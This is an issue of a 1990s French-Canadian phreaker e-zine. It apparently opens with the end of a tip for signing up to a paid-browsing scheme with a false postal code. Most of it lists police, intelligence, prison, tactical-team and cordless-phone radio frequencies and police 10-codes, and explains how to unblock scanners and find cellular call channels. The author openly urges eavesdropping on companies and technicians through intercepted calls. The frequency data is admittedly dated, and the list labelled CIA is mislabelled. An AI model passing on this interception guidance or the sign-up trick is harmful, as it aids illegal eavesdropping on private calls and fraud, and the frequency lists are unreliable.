like to cancel your membership, click here. Ensuite désinstaller le programme
de la view bar sur votre ordinateur, ensuite réinstallez-le, et
réinscrivez-vous!

Pour s'inscrire:
Tout simplement en allant a cette adresse http://www.alladvantage.com/
puis cliquer sur "JOIN" une fois rendu sur leur site. Prenez le temps d'y
lire leur F.A.Q. ("Frequently Asked Questions" ou Foire Aux Questions) dans
la section "How it works", c'est vraiment complet. Pour plus de sécurité,
la page où vous vous inscrivez est encryptée. Quand vous aller entrer vos
coordonnées lors de votre inscription, Entrez le Code Postal suivant au
lieu du votre! (Inquiètez-vous pas, vous pourrez mettre votre vrai code
postal par la suite, pour qu'ils puissent vous envoyer votre chèque$$ ;-) )
K0A 3C0


lastnews.forez.com
-[Dernieres Nouvelles]- La références des nouvelles internet

____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 8-Fréquences (The Recueil)
|( ) Phreak ( ) Hack (X) Autres
'._______Par PaToFF ____________________ ______ patoff22@hotmail.com ___


Bon ca y est, c'est encore moi content? J'espère car cet article est
presque ne bible pour ca le nom de The Recueil qui est en prime avec le
titre habituel.Et aussi je crois qu'il est assez complet dans le style
fréquences secret police...etc., mais même a vous checkerer dans les choses
a venir: que je vais sûrement refaire un petit bout d'article sur c'est
sorte de fréquence car les téléphones et police...sont sûrement les plus le
fun a écouter et les plus intéressante. Oh aussi.Il y a beaucoup de texte du
style liste d'épicerie ha ha! alors suposément que certain n'aime pas tk on
n'est pas tous de dieu hein? alors a vous de voir :) So Enjoy!


Bon dans ce mag je vais vous donner(parler) de:
Les fréquences secret de police CIA..etc que j'ai finalement retrouver
quand mon cousin a renverser sa bière a terre j'ai vu que la revu etait en
dessous de mon lit chouette n'est ce pas? Et aussi que j'ai trouver sur un
site que j'ai trouver dans ma revu... Et puis aussi il y a les ondes des
cellulaires et je vais donner les codes 10 de la SPCUM et redonner quelques
codes 10 puisque dans les Fréquences secrètes ces codes sont donnés car il
m'en manquait quelques un. Et un tas de petites affaires sur les ondes
(satellite,Sans fil etc...) et aussi un article trouver sur le net par neuro
qui est a la fin de cette article et qui complète quelques une de mes
techniques autrement dit une bonne affaire... Et Vous la dedans?

Ne sachant même pas si quelqu'un a quelque part lis mon article ou vous le
sautez tous eh. Vous pourriez scanner un peu ca serais bien pareil comme le
scanne de numéro de téléphone si on réussirait a trouver des compagnie
petite ou grosse on pourrais certainement trouver de très bonne utiliser
avec cela et si vous participer on affichera tous ca sur le site ou encore
dans un mag a venir qu'en dites vous? J'Aimerais bien avoir des réponses SVP
alors n'hésiter pas a m'écrire et même si c'est pour autre choses que cela
alors je vous souhaite une bonne lecture et
penser a cela... Enjoy it Again!

Notes: Certaine chose(cellulaire dans cet article) sont peut-être un peu
dépassé et peut-être quelques une de ces ondes ne sont plus ce quel sont ,
je dirais que cela devrais être rare sinon veiller me le dire merci.... Et
aussi je tient a dire que je prend mes infos dans le livre: HARRUTEQ Scanner
Book, Québec Éditions


Disclamer: Mouin bien vous le savez si vous êtes quelqu'un qui a pas
d'affaire a lire ceci;Police ,GRC etc...passer dont cet article car vous le
saviez bien que ce n'est que de l'information et rien de plus!

La Loi et les récepteur a balayage (scanner):
Le Canada est unique en reconnaissant que "le spectre de radio-frequence est
une ressource vitale publique dont bénéficient les possesseurs de permis en
y ayant accès et en y utilisant les fréquences"
De plus ces utilisateurs paient pour leur permis, Augmente les revenus du
trésor (caliss) en plus de contribuer au plaisir de les écouté :). Les
règlements les plus particulier pour nous sont:


4. (1) Il est interdit, sans une autorisation de radiocommunication et sans
en respecter les conditions, d'installer de faire fonctionner ou de posséder
un appareil autre:

(B) Qu'un appareil qui ne peut que recevoir de la radiocommunication et
n'est pas une entreprise de réception de radiodiffusion.


9. (1) Il est interdit:
(B) sans excuse légitime,de gêner ou d'entraver la diocommunication.

9. (2) Sauf exception réglementaire, il est interdit d'intercepter et soit
d'utiliser soit de communiquer toute radiocommunication -- autre que la
radiodiffusion -- sans l'autorisation de l'émetteur.


En d'autre mots:

- Les balayeur sont légaux ainsi que leur écoute.
- Aucune fréquence limite -- Pas de permis requis
- Il est interdit d'utiliser les information entendues a des fins
personnelles
- Il es interdit de divulguer toutes communications entendues...

Pour les aspects techniques veiller vous referez a l'article Scanner D'ondes
dans Le PyroFreak #8 et pour vous faire une antenne aller voir dans le
PyroFreak #9 So Enjoy it!

-- Fréquences Secrètes --
Bon sûrement le plus intéressant qui je vous le dit jais tirer ca du
magazine Net-Mag qui ce vend assez cher fak acheter pas ca :) et du site
très bon pour fréquence:http://hlm.le-village.com/suburban et aussi
http://altern.org/suburban/ qui je crois est le même site :) et dans les
link sur ce site il y a le site de VE2VGA qui a fais le texte qui est plus
bas... Alors comme vous si savez si on ce donnela peine de chercher un peu
on peu très bien trouver quelque chose de bien même que le gouvernement
donne ces fréquences et plein d'autre truc qui peu nous être utile c'est ca
qui arrive quand ya trop de lois et de règlements!

- Fréquences de la CIA ,SCRS ,GRC et Police...-
Alors peut-être si vous avez déjà écoute des fréquences de police vous en
reconnaîtrai Et bien sur d'autre que vous savez sûrement pas :)


Notes: -Fréquences souvent codées

Service Canadien du Renseignement de Sécurité (SCRS)

421.8875MHz
421.9875MHz
422.0875MHz
421.9375MHz
422.0625MHz
425.7375MHz

CIA

Noms Fréquences Descriptions
Able 32.230MHz WHCA Transportation
Alpha 166.5125MHz Escort and security
Baker 165.7875MHz Field offices (nationwide)/Pres/VP/VIP Escorts
Charlie 165.3750MHz Field offices primary/command post(nationwide)
Delta 169.9250MHz WHCA vans / phone patches / Marine Service Detachment
Echo 407.850MHz Air Force 1/2 phone patch (uplink)
Foxtrot 415.700MHz Air Force 1/2 phone patch (downlink)
Golf 166.4000MHz Field offices (nationwide)(Charlie repeater input)
Hotel 165.6875MHz WHCA VP staff / White House garage
Hotel 166.2125MHz Presidential protection
Hotel 167.900MHz WHCA VP staff / White House garage
India 166.200MHz Headquarters / Presidential protection
India 407.925MHz Headquarters /Presidential protection / Treasury
Juliet 170.000MHz Camp David paging
Kilo 167.825MHz Presidential residence(LBJ) phone (duplex)
Lima 168.7875MHz Presidential residence(LBJ) phone (duplex)
Lavender 418.125MHz WHCA Transportation
Mike 165.2125MHz Former President and dignitary protection
November 166.7000MHz WHCA White House Staff
Oscar 164.8875MHz Presidential protection(primary)
Papa 164.4000MHz Field offices / White House perimeter patrols
Quebec 166.7000MHz White House staff
Romeo 166.4000MHz X-Ray repeater input
Sierra 165.5125MHz WHCA White House Staff / pagers
Tango 164.6500MHz Field offices / Pres/VP protection
Uniform 165.0875MHz AF1 Communications
Uniform 361.600MHz AF1 Communications
Victor 164.1000MHz WHCA Pres/VP protection
Whiskey 167.0250MHz Paging
X-ray 166.4625MHz Treasury common
Yankee 162.6875MHz Air Force 1/2 phone patch (uplink)
Zulu 171.2875MHz Air Force 1/2 phone patch (downlink)


Noms Sortie Entrée Descriptions
Green 415.750MHz 407.875MHz Training division
Black 415.100MHz 418.325MHz Training division
Blue 414.800MHz --- Training/protective support divisions
Violet 415.875MHz --- Training division
Gray 415.800MHz --- Protective support division
Gold 415.675MHz 419.075MHz Communications division
Black 415.675MHz --- Executive protection division
Orange 414.950MHz --- Executive protection division
Tan 414.850MHz --- Foreign Mission divisions
Brown 414.850MHz 418.800MHz Uniformed division
Red 415.975MHz 419.725MHz Foreign Mission/Uniformed divisions
Silver 415.650MHz 419.100MHz Foreign Mission/Uniformed divisions
Gray 418.350MHz 407.750MHz Uniformed division
Orange 418.775MHz 414.950MHz Uniformed division
Yellow 414.675MHz 418.150MHz Uniformed/Technical security divisions
Green 419.725MHz --- Technical security division

Technical security division (usage spécial)

NOMS FRÉQUENCES DESCRITIONS
F1 408.000 MHz RF Alarm
F2 411.000 MHz RF Alarm
F3 408.500 MHz Tracker (F1)
F4 408.975 MHz Tracker (F2)

Microphones sans-fil (radios portables)
# FRÉQUENCES
1 406.2625 MHz
2 407.825 MHz
3 407.875 MHz
4 407.975 MHz

Presidential Nighthawk Aircraft Fleet (HMX)
Fréquences Descriptions
46.750 MHz Helicopter ops/transport (primary)
46.700 MHz Helicopter ops (secondary)
46.800 MHz Helicopter ops (alternate)
34.350 MHz VIP transport net
375.000 MHz Transport
142.750 MHz Command post
265.800 MHz Squadron common

Limousines (local-DC) (duplex)
Entrée 408.450 MHz
Sortie 407.850 MHz



FREQUENCE DE LA SQ


F1: 166.800MHz
F2: 166.500MHz
F3: 167.040MHz
F4: 166.620MHz
F5: 167.010MHz
F6: 166.740MHz
F7: 167.340MHz
F8: 166.680 MHz
F9: 166.830 MHz
F10: 166.650 MHz
F11: 166.635 MHz
F16: 152.510 MHz
F17: 152.525 MHz
F18: 152.540 MHz
F20: 154.220 MHz
F21: 154.680 MHz
F23: 154.740 MHz
F25: 153.920 MHz

Fréquences: Description:

166.8300 MHz Poste St-Romuald, Rive sud
167.0100 MHz Poste Quebec-Metro, Rive nord
166.5000 MHz Poste St-Anne Beaupre et Porneuf
167.0400 MHz Quartier general et urgence
166.6800 MHz Quartier general
166.8000 MHz Quartier general

Notes: Ces fréquences sont régulièrement brouiller

410.8125 MHz Groupe Tactique D'intervention
411.4625 MHz Groupe Tactique D'intervention
411.5125 MHz Groupe Tactique D'intervention
413.0125 MHz Groupe Tactique D'intervention

Notes: Ces fréquences sont utiliser lors d'opération d'envergure comme celles du groupe
Tactique d'Intervention

171.1800 MHz Auto Patrouille, service radar
172.0200 MHz Walkie-talkie


- Leurs portatifs
Récepteur 1 a 3
454.475MHz
454.550MHz
454.400MHz

- Fréquence de leurs Hélicoptère
154.980MHz

- Les fréquences de la SPCUM -
1- 1: 410.1125MHz (district 11 a 15 et 21-22)
1- 2: 410.2526MHz (auxiliaire)
1- 3: 410.3625MHz (district 23-24-25-32-33-34)
1- 4: 410.4875MHz (1-31-43-44)
1- 5: 410.6125MHz (district 45-51-52-53-54-55)
1- 6: 410.7875MHz (auxiliaire)
1- 7: 410.9125MHz (général)
1- 8: 410.6625MHz (simplex)
1- 9: 412.6875MHz (opérations spéciales)
1- 10: 411.3125MHz (opérations spéciales)
1- 11: 412.1375MHz (opérations spéciales)
1- 12: 410.0125MHz (opérations spéciales)

4- 1: 411,1875 MHz (centre opérationnel)
4- 2: 418,2125 MHz (surveillance physique)
4- 3: 411,5375 MHz (groupe tactique)
4- 4: 418,7375 MHz (surveillance physique)
4- 5: 418,7875 MHz (surveillance physique)
4- 6: 418,1875 MHz (surveillance physique)

Communications numériques (4800 bps sur terminaux MDI) (Pas sur de la vitesse si est bonne!)
D1: 410,0375 MHz
D2: 410,3375 MHz
D3: 410,8125 MHz
D4: 411,2125 MHz

411.4375 MHz (Sécurité de la STCUM (C.O.S) Transit security)
411,2375 MHz (Mesures d'urgences (BMU) Emergency measures)












- Fréquences de l'armée canadienne -
34.700MHz
38.600MHz
38.900MHz



GRC

Les Fréquences de la GRC sont généralement dans les bandes 139 et 140MHz

Fréquences: Descriptions:
139.1400MHz Utilisation locale seulement
139.1700MHz Utilisation locale seulement
139.7100MHz Utilisation générale
139.7400MHz Utilisation locale seulement
139.8000MHz Utilisation générale
139.8300MHz lien avec Mont Magantic

139.9800MHz Sécurité aéroport de Québec
461.0750MHz Urgence aéroport de Québec

140.3700MHz Utilisation locale seulement
140.6700MHz Utilisation locale seulement
140.7600MHz Utilisation générale
422.0875MHz Utilisation générale


POLICE


Notes: Ces fréquences sont un peu veille et je les ai pas tester alors
a vous de checker de toute façon ils devraient toute marcher
peut-être à part les voirie

EXTERIEUR REGION DE QUEBEC:

Villes: Description: Fréquences:

Baie St-Paul Pompier 154.3250MHz
Voirie 159.2100MHz

Beauceville Voirie 167.0400MHz

Black Lake Police et Pompier(same) 154.175/154.8600MHz
Voirie 169.2600MHz

Clermont Police et pompier(same) 154.6500MHz
Voirie 169.2300MHz

Cowansville Pénitencier Fédéral 151.5200MHz
150.6050MHz
149.8300MHz

Deschaillons --- ---

Disraeli Police 158.9700MHz
Pompier et Voirie(same) 159.1200MHz

Donnacona Police et Pompier(same) 158.9700MHz
Voirie 169.4400MHz
Pénitencier Fédéral 151.5200MHz
150.6050MHz
149.83/167.550MHz

Dosquet Voirie 155.6400MHz

Lac Etchemin Pompier et Voirie(same) 168.7800MHz

Laval Pénitencier 151.055/151.4750MHz

Lyster Pompier et Voirie(same) 159.4500MHz

Malbaie Police et Pompier(same) 151.2350MHz
Voirie 167.4500MHz

Montmagny Police et Pompier(same) 158.9700MHz --|
Voirie 169.1400MHz --|
|---> Same? comme plusieur autre...
Neuville Pompier et Voirie(same) 155.1900MHz |
|
Plessisville Police et Pompier(same) 158.9700MHz --|
Voirie 169.1400MHz --|

Port-Cartier Pénitencier Fédéral 150.6050MHz
149.8300MHz
151.5200MHz

Portneuf Voirie 169.2300MHz

St-Agapit Police et Pompier(same) 153.9500MHz

St-Damien Pompier et Voirie(same) 169.2300MHz

St-Etienne Pompier et Voirie(same) 169.2300MHz

St-Georges Police Est 158.9700MHz
Police Ouest 158.8200MHz
Pompier 158.9700MHz
Voirie 169.08/164.9400MHz
Officiel 169.86/169.9400MHz

St-Joseph Police et Pompier(same) 154.2950MHz
Voirie 169.5000MHz

St-Marc-des- Pompier 164.9400MHz
Carrieres Voirie 164.9400MHz

Ste-Anne-des- Pénitencier 151.475/413.9375MHz
plaines



Ste-Croix Voirie 143.0250MHz

Ste-Marie Police et Pompier(same) 154.2650MHz
Voirie 158.9850MHz
Officiel 153.8900MHz

St-Michel Police(SQ) 166.8000MHz

St-Raymond Police et Pompier(same) 154.0400MHz
Voirie 269.0500MHz

Thetford Mines Police et Pompier(same) 412.9750MHz
Voirie 169.9750MHz
Officiel 154.65/155.7600MHz

REGION DE QUEBEC:

Villes: Description: Fréquences:

Ancienne-Lorette Police et Pompier(same) 151.1450MHz
Voirie 169.3500MHz

Beauport Police et Pompier(same) 155.280/155.6100MHz
Voirie 169.7400MHz

Beaupre --- ---

Berniere Pompier 151.2650MHz

Boischatel Pompier et Voirie(same) 151.2650MHz

Canadien National Police 160.5750MHz

Canadien Pacifique Police 159.8850MHz

Cap-Rouge Police et Pompier(same) -Voir St-Foy-
Voirie 169.4700MHz

Charlesbourg Police 412.1125/412.8125MHz
Pompier 154.8300MHz
Voirie 169.4700MHz

Charny Police et Pompier(same) 154.1300MHz
Voirie 168.7800MHz

Chateau-Richer Voirie 159.2700MHz

Lac Beauport Pompier et Voirie(same) 151.5350MHz

Lac St-Charles Pompier 155.1900MHz

Lauzon Police et Pompier(same) 412.3875MHz
Voirie 169.1700MHz

Levis Police 412.9875MHz
Pompier 413.5125MHz
Voirie 169.440/.140/.230MHz

Loretteville Police 412.9625MHz
Pompier 412.5875MHz
Voirie 151.235/413.4875MHz

Port de Quebec Police 154.4000MHz
Voirie 167.6100MHz

Quebec Police r:155.5800MHz
g1:155.7900MHz
g2:155.4000MHz
e1:155.8500MHz
e2:155.1300MHz
f:155.8800MHz
rs:154.7100MHz
fs:154.7700MHz
Pompier 154.250/155.520/154.340MHz
Voirie 169.890/169.590MHz

St-Augustin Pompier 410.0125MHz
Voirie 168.7800MHz

St-Ferreol des Voirie 163.5000MHz
neige

St-Romuald Police 154.6500MHz
Pompier et Voirie(same) 155.0400MHz

Ste-Foy Police et Pompier(same) 412.3125/412.9125MHz
413.3125MHz
Voirie 169.110/169.5300MHz

Shannon Pompier et Voirie(same) 173.46/.64/.82MHz

Sillery Police et Pompier(same) 155.9700MHz
Voirie 410.0375MHz

Stoneham Pompier et Vorie(same) 143.0250MHz

Universite Laval Securite 159.3000MHz

Val-Belair Police ???
Pompier 412.4875MHz
Voirie 411.6875MHz

Valcartier Police 173.2500MHz
Base Millitaire Pompier 173.460/173.3500MHz
Voirie 173.6700MHz

Valcartier Village Pompier et Voirie(same) 170.9400MHz

Vanier Police et Pompier(same) 412.0125MHz
Voirie 410.0875MHz

Village Huron Police 154.9200MHz
Pompier et Voirie(same) -Voir Loretteville-


Bon ca a peu près ca pour les fréquences "Secrètes" comme vous avez du
constater c'est pas si secret que cela!! Pareil que les site Internet
secrets que vous verrez ou que vous avez déjà vu dans ce mag.

- Conclu -
Sur le site (http://hlm.le-village.com/suburban/) vous pourrez voir d'autre
codes 10 et vous verrez que la SPCUM et la SQ sont assez différent comme
vous savez :) aussi il y a plein d'autre fréquences armée cinéma hôpitaux et
autre...
Il y a aussi de plan d'intercepteur-décodeur de pagette que je vous donnerai
peut-être la prochaine fois
Press Down (to continu)


-- Codes 10 Corriger et SPCUM en prime --
C'est les codes du dernier mag mais j'en ai rajouter quelques un que j'avais
pas dans ceux de la SQ et j'ai laisser la RCMP la juste comme cela :)

Sûreté: RCMP:
10-1 A l'écoute 10-4 message compris
10-2 Répéter votre message 10-5 en attente (stand-by)
10-3 Canceller 10-7 hors des ondes
10-4 Message compris (terminer) 10-8 retour en ondes
10-5 Accident matériel 10-9 répéter
10-6 Accident avec blesser , mort 10-12 en route
10-7 Hold-up 10-20 en position
10-8 Barrage routier(Road Block) 10-21 appeler par téléphone
10-9 Position et direction 10-27 vérification permis de conduire
10-10 Message général 10-28 vérification immatriculation
10-11 Immobilisez véhicule et prenez 10-29 vérification de dossier
message 10-45 retour au bureau
10-12 Individu 10-99 portatif
10-13 Appelez par téléphone
10-14 Besoin d'assistance
10-15 Message confidentiel
10-16 Rapport préliminaire
10-17 État des routes
10-18 Hors des ondes + (la ou les raison)
10-19 Retour en ondes
10-20 Repas (Donner numéro de téléphone)
10-21 Téléphone
10-22 Enquête
10-24 Appelez au quartier général
10-25 Repas
B.F.C Bureau des enquêtes criminelles
B.S.R Bureau de la sécurité routière
D.P.J Directeur de la protection Jeunesse
ERAM Escouade Alcool & Moralité
DBO Demande de vérification d'objet
DVQ Demande au Bureau Véhicules du Qc
DVQ#1 vérification par plaque
DVQ#2 vérification par le nom + date de naissance
DVQ#3 vérification pour dossier
DVQ#4 vérification par numéro de série
DPE Vérification de dossier
DPL Vérification de plaque
FPS Dossier criminel

-SQ code 100-
20 Opération cent
21 Priorité radio
22 Silence radio
23 Communication en simplex
24 Opération termine
25 Opération poursuivie
26 Interceptez Véhicule suspect
27 Agir avec prudence
28 Sans sirène ni clignotant
29 Demande renfort
30 URGENCE
31 Fusillade
32 Vol a main armer
33 Personne jugée dangereuse
34 Enlèvement
35 Évasion
36 Prise D'otage(s)
37 Émeute
38 Alerte a la bombe
39 Désastre aérien
40 Homicide
41 Incendie
42 Attroupement Illégal
43 Délit de fuite
44 Facilites affaiblies
45 Transport de détenu(s)


SPCUM:

Requêtes informatisées (partiel)

BVQ: (type 1) par immatriculation
BVQ: (type 2) par le nom
BVQ: (type 3) par permis de conduire
BVQ: (type 4) par numéro de série
COM: Message au C.I.P.C.
DAF: Vérification au fichier d'armes à feu
DBA: Vérification au fichier des bateaux
DBO: Vérification au fichier des objets
DDE : Vérification au fichier personnes par la fiche dentaire
DMO: Vérification au fichier des bateaux moteur
DPE: Vérification au fichier des personnes
DPI: Vérification au fichier des pièces
DVA: Vérification au fichier des valeurs
DSV: Demande spéciale au fichier des véhicules
DVQ: Demande au bureau des véhicules du Québec
FPS: Vérification au fichier des dossiers judiciaires ou criminels
MEUR: Message urgent à transmettre (terminaux MDI)


Codes 10 du SPCUM

10-01: Essence/huile
10-02:Repas
10-03: Réparation mécanique
10-04:Réparation radio
10-05: En service
10-06: Répéter dernier message
10-07:Besoin d'aide - urgent
10-08: Hors service
10-09:Donner votre position
10-10: Annuler message / appel
10-11: En route
10-12: Sur les lieux
10-13:Transport de détenu
10-14: Pratique de tir
10-15: Lavage de véhicules
10-16: Message
10-17: Remorquage requis
10-18 ou 10-19: Administration (appelez au poste)
10-19: Appelez votre poste
10-20: Accident
10-21: Uniforme
10-24: Agir avec prudence
10-25: Peut parler librement? (infos confidentielles)
10-26:
10-27: possible "changez canal 7 "
10-36: Canceller 10-37
10-37: Bouton Panique terminaux et walkie-talkie

Codes généralement utilisés par le SPCUM

Abréviations:

BL - Blessés
EL - Élections (nouveau depuis 1995)
IV - Ivresse
MM - malade mental
SA - suspect armé
SP - suspect possible
SF - suspect en fuite
SU- suspect sur les lieux
VC - Violence conjugale
X,XE - jeune enfant


Classification des codes

001: Homicide Meurtre
006: Homicide Tentative
014:
018: Vol qualifié
021: Vol sur la personne
022: Introduction par effraction
026: Véhicule Vol
032: Bicyclette volée
033: Vol dans véhicule
034: Vol à l'étalage
035: Vol Autres
037: Vol de bicyclette
041: Recel
042: Fraudes
050: Jeu et paris
054: Personne armée
055: Explosifs trouvés
061: Personne recherchée
063: Troubler la paix
064: Évasion
065: Actions indécentes
071: Méfaits, biens privés
072: Méfaits, biens publics
073: Infraction au code criminel
111: Accident Délit de fuite
116: Capacité conduire affaiblie
204: Agression sexuelle
211: Voies de fait contre agent
212: Voies de fait
214: Prise d'otages
222: Visites de contrôle
250: Émeute
255: Explosion
316: Ivressomètre
333: Information/cas référé
400: Alarme sans précision
401: Alarme cambrioleur
402: Alarme hold-up
403: Alarme non fondée
404:
407: Assistance à huissier
409: Coup de feu
410: Semblerait être variante de 409
426:Véhicule sans permis
444: Enquête - lieux publics
445: Enquête - lieux privés
455: Substance dangereuse
465: Rencontrer dépanneuse
481: Enfant abandonné ou maltraité
486: Excavation dangereuse
491: Fil brisé (RC avec Hydro-Québec)
492: Drogue et stupéfiants
499: Non fondé
555: Radar ("patrouille mixte")
600: Billet de circulation
601: Contrôle de circulation
607: Appel à la bombe
608: Colis suspect trouvé
609: Bruit
610: Conflit
611: Manifestation
612: Différent ouvrier
613: Coopérer/rencontrer
615: Incendie
616: Personne à expulser
617: Personne dans le besoin
618: Personne égarée
619: Personne malade mental (MM)
620: Personne à aviser
621: Personne gisante
622: Garde de détenu
626: Véhicule abandonné
630: Dommage à la propriété
631: Morsure d'animal
632: Animal mort, perdu, blessé
638: Bagarre
640: Plaque perdue/volée

641: Plaque trouvée/retrouvée
643: Objet perdu
644: Objet trouvé/retrouvé
645: Menace/harcèlement
655: Fuite de gaz
699: Non localisé
807: 10-07 transmis par tiers
901: Personne blessée/malade
902: Décès
903: Disparition rapport
905: Accident
907: Assistance à...
922: Tentative de suicide
923: Personne disparue localisée
933:Info d'intérêt policier
926: Véhicule retrouvé
944: Poursuite active (code retiré?)
973 :Autre incident
999: Police demandée sans précision


-- Les ondes et les cellulaires ,Sans fil ET + --
Notes: Tout ou presque ceci peux ce relier au ondes a la fin de l'article
(Téléphone)

Les ondes des téléphones cellulaires on les retrouves dans la bande 800Mhz.
Plusieurs scanner peuvent capter ces fréquences. Car certains modèle sont
modifier par le fabriquant pour bloquer la réception de ces fréquences.Mais
il est possible de débloquer la réception des cellulaires sur la plupart des
modèles modifier. Vous avez juste a vous informer a votre vendeur ou chez
Radio Shack quelque part comme ca, il vont vous le dire. Si vous ne voulez
pas investir pour le faire modifier ou le faire vous mêmes le truc des
fréquences image s'applique ici (PyroFreak #8). Additionner le numéro
magique et le tour est jouer! Si votre appareil n'est pas fabriquer pour la
bande 800Mhz il en est impossible de le modifier.

Tout n'est pas perdu il existe des convertisseurs de fréquences avec
lesquels vous serez capable de capter la bande 800Mhz. Ils se connectent
entre le récepteur et l'antenne. En général il suffit d'ajouter 400Mhz dont
pour capter la fréquence 855.0000, il faudra programmer 455.0000 .
L'inconvénient de ce système est que si un signal est émis a 455.0000 est
capter par l'appareil, il peut devenir ennuyant écouter deux conversations a
la fois. Les convertisseurs sont annoncer dans les magasins spécialiser et
chez les vendeur de scanner.


Il y a quelques années(vu de la date de mes infos :) ) Au état et au Canada
il y avais environ 832 fréquences allouées pour le services de téléphone
cellulaires et d'autre fréquences additionnels sont prévues pour le futur.
Le système de contrôle par ordinateur choisit une paire de fréquence (mobile
et base), la meilleur parmi chacune des 416 fréquences de Bell cellulaire ou
Cantel & Cie. Ainsi le signal faiblit , l'ordinateur interroge les cellules
environnantes pour transférer la conversation sur une autre paire de
fréquences qui capte mieux le signal. Tout cela ce fait en une fraction de
seconde sans que la conversation ne soit interrompue. La base transmet les
deux cotes de la conversation (mobile et base), ce qui peut surprendre les
usagers de ce système. Beaucoup de gens sont sur l'impression que les
conversations a partir de téléphones cellulaires sont totalement privées et
qu'il est interdits de les écouter. Ce qui n'est vraiment pas le cas. Une
autre affaire que les usager nesavent pas non plus des propriétaire de
téléphones cellulaires c'est qu il est interdit d'utiliser un langage
obscène ou discriminatoire sur les ondes publiques. La pénalité pour une
telle offense est de 1'000$ ou 6 mois de prison.(Caliss que ces mal faites
la justice ca ce peut pas!)Même que la GRC a déjà faites des saisis un peu
partout au Canada. Mais vous ne pouvez avertir personne car il est interdit
de divulguer ce qu'on entends sur les ondes... Et même il y a des scanners
qui on des plug pour mettre une enregistreuse qui s'active a chaque fois
quelle entend une voix alors ceci peut être très mais très intéressant :)


Et aussi il est possible que si vous pouvez capter une fréquence et
cellulaires que la personne qui a le cellulaire puisse le savoir alors peut-
être que des compagnies monte des ti coup monte comme donner des "bon
tuyaux" pour tel ou tel affaire et vous pouvez vous faire avoir si vous vous
rendez compte que ca existe pas ou que vous faites beaucoup d'argent et
blablabla...

Bon alors pour pouvoir capter des fréquences de téléphones cellulaires,
scanner dans les 80Mhz et quand vous capter une fréquence vous l'inscrivez
dans une de vos mémoire et quand vous écouter cette fréquence et que les
ondes coupe alors peser sur search pour retrouver la même fréquence qui a
changer de place comme je lai expliquer plus haut... d'habitude les
fréquences seront espacer d'environ 30 ou 45 Mhz.


Alors je vais vous donner quelques fréquences de cellulaire en plus que ceux
de VE2VGA qui ce retrouve plus loin...


Alors la compagnie Cantel ces ondes se situe environ:
de 825.030MHz a 834.990MHz en mobile
de 870.030MHz a 879.990MHz en base

Et Bell:
de 835.020MHz a 844.980MHz en mobile
de 880.020MHz a 889.980MHz en base

Comme je le disais plus haut pour trouver ces fréquence un calcul ce fais.
En mobile ou en base 30KHz séparent les canaux et entre les mobile et la
base 45MHz

(Pour le canal 30: 30 fois 30KHz = 900KHz)
mobile: canal 30 825MHz + 900KHz = 825.900MHz
base: canal 30 825MHz + 45MHz + 900KHz = 870.900MHz
L'écoute doit ce faire sur la base

D'habitude les 21 premier canaux sont réserver pour des information crypter
donc illisible et servent sûrement a la compagnie...

Pour le satellite MSAT les fréquences sont:
Fréquences D'entrées: 821MHz a 825MHz
Fréquences de sortie: 866MHz a 870MHz

- Bon alors je le téléphone sans fils -
Le téléphone sans fil se retrouve dans les 40MHz...Depuis 1984 cette bande
est utiliser et avant cela les fréquences se situaient entre 1.6 et a.8MHz


Combine: Base: Canaux:
49.670 46.610 01
49.770 46.710 04
49.830 46.770 06
49.830 1600Khz avant 1984
49.845 46.630 02
49.845 1710KHz 07 --- avant 1984
49.860 46.670 03
49.860 1730KHz 13 avant 1984
49.875 46.730 05
49.875 1750KHz 19 avant 1984
49.890 46.830 07
49.890 1770KHz 25 avant 1984
49.930 46.870 08
49.930 1690KHz 01a avant 1984
49.970 46.970 10
49.970 1800KHz --- avant 1984
49.990 46.930 09 avant 1984

Il faut aussi savoir que les fréquences 49.830MHz 49.845MHz et 49.875MHz
sont également utilisées dans des systèmes d'interphone de surveillance
(babysiter).
Aussi, les walkie-talkie 49MHz opèrent entre 49.830 et 49.990MHz


Alors avec ceci quoi de bon que de pouvoir espionnez des Cie ou n'importe
quoi qui peut être bon pour vos "plan" Ca fais simplement une manière de
plus d'avoir des infos...y s'agit seulement de capter un technicien de
réseau ou quelque personne dans ce style qui détiennent des informations et
c'est bien plus simple non? Malgré que oui faut la trouver cette fréquence
:)


-- Satellite --
Bon il n'est pas requis d'avoir de l'équipement spéciale pour capter ces
ondes. Une petite antenne horizontale peut faire l'affaire. Pour la majorité
des fréquences l'antenne devra être oriente vers lest. Puisque la majorité
des satellite inscrit dans es livre comme le mien sont situer au dessus de
l'océan. La meilleur réception se fais entre 10H00am et 14H00Pm. On
recommande l'empli de amplificateur d'antenne les signaux étant faible.
Assurez vous que l'amplificateur soir adapter pour les bandes VHF et UHF de
50 a 900MHz. De cette façon l'amplificateur pourra servir pour la majorité
des fréquences de votre appareil. Et vous devriez avoir aussi un "Switch
Box" Le fais de disconnecter la prise de courant aucun ondes ne passera dans
l'amplificateur.


Notes:
Ce satellite est relier a une des agence secrète plus haut mais je ne sais
plus laquelle alors vous avez juste a essayer. 931.9375 MHZ



****************************************************************************
-- Diverses liste de Fréquences --
Notes: Par Neuro Crédit: Guy, VE2VGA



Téléphones sans fils domestiques

BASE MOBILES MODELES, NOTES, DETAILS, ETC
902.10000 926.10000 PANASONIC KXT-9000, CH.01 ( MODELES 60 CANAUX ,
902.13000 926.13000 PANASONIC KXT-9000, CH.02 NUMERIQUE )
902.16000 926.16000 PANASONIC KXT-9000, CH.03
902.19000 926.19000 PANASONIC KXT-9000, CH.04
902.22000 926.22000 PANASONIC KXT-9000, CH.05
902.25000 926.25000 PANASONIC KXT-9000, CH.06
902.28000 926.28000 PANASONIC KXT-9000, CH.07
902.31000 926.31000 PANASONIC KXT-9000, CH.08
902.34000 926.34000 PANASONIC KXT-9000, CH.09
902.37000 926.37000 PANASONIC KXT-9000, CH.10
902.40000 926.40000 PANASONIC KXT-9000, CH.11
902.43000 926.43000 PANASONIC KXT-9000, CH.12
902.46000 926.46000 PANASONIC KXT-9000, CH.13
902.49000 926.49000 PANASONIC KXT-9000, CH.14
902.52000 926.52000 PANASONIC KXT-9000, CH.15
902.55000 926.55000 PANASONIC KXT-9000, CH.16
902.58000 926.58000 PANASONIC KXT-9000, CH.17
902.61000 926.61000 PANASONIC KXT-9000, CH.18
902.64000 926.64000 PANASONIC KXT-9000, CH.19
902.67000 926.67000 PANASONIC KXT-9000, CH.20
902.70000 926.70000 PANASONIC KXT-9000, CH.21
902.73000 926.73000 PANASONIC KXT-9000, CH.22
902.76000 926.76000 PANASONIC KXT-9000, CH.23
